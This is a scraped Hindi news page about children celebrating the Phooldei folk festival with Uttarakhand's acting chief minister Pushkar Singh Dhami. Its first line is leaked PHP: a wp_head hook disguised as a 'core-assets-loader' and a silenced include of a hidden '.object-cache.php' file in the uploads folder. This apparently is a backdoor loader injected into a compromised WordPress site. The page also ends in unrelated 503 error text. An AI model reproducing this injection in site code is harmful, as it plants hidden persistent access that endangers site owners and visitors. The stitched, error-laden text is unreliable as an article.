add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); उत्तराखंड में फूलदेई लोकपर्व का उत्सव: सज धज कर फूलों की टोकरी लेकर मुख्यमंत्री आवास पहुंचे बच्चे, नेताओं ने दी शुभकामनाएं, तस्वीरें… – SOCH INDIA
Menu

उत्तराखंड में फूलदेई लोकपर्व का उत्सव: सज धज कर फूलों की टोकरी लेकर मुख्यमंत्री आवास पहुंचे बच्चे, नेताओं ने दी शुभकामनाएं, तस्वीरें…

nobanner
उत्तराखंड में आज से फूलदेई का उत्सव शुरू हो गया है। सुबह-सुबह ही बच्चे हाथों में फूलों की टोकरी लेकर लोगों के घरों की देहरी पर फूल डालने निकल पड़े हैं। राजधानी में कुछ बच्चे सीएम आवास पहुंचे हैं। कार्यवाहक मुख्यमंत्री पुष्कर सिंह धामी ने मुख्यमंत्री आवास में बच्चों के साथ उत्तराखंड का लोकपर्व फूलदेई मनाया।

पुष्कर सिंह धामी ने  प्रकृति का आभार प्रकट करने वाले फूलदेई पर्व की प्रदेशवासियों को शुभकामनाएं दी और प्रदेश की सुख- समृद्धि की कामना की। उन्होंने अपने आवास पर पहुंचे बच्चों को उपहार भेंट किये। शशिभूषण मैठाणी एवं पर्वतीय संस्कृति संरक्षण समिति के सहयोग से यह कार्यक्रम आयोजित किया गया।

ये भी पढ़ें…सोनिया से कैसे नजरें मिलाऊंगा: फिर छलका हरीश रावत का दर्द, कहा- दिल्ली जाने की कल्पना मात्र से ही मेरे पांव और मन भारी

कार्यक्रम के दौरान कार्यवाहक मुख्यमंत्री ने कहा कि फूलदेई उत्तराखंड की संस्कृति एवं परंपराओं से जुड़ा प्रमुख पर्व है। कहा कि किसी भी राज्य की संस्कृति एवं परंपराओं की पहचान में लोक पर्वों की अहम भूमिका होती है। हमें अपने लोक पर्वों एवं लोक परम्पराओं को आगे बढ़ाने की दिशा में लगातार प्रयास करने होंगें।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.